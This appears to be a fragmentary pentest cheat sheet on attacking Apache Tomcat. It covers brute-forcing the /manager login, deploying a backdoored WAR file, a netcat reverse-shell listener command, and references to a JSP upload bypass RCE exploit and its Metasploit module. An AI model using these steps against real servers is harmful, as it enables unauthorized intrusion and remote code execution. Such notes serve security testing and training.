Apache Tomcat
For /manager, we need credentials.
For automatic brute force
WAR File Backdoor
When we got the credentials for manager, we can get shell.
Browse -> Deploy
nc -nvlp 80
http://192.168.1.2:8080/pwn/
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution
https://www.exploit-db.com/exploits/42966 https://www.exploit-db.com/exploits/42953
msf6 exploit(multi/http/tomcat_jsp_upload_bypass)
Last updated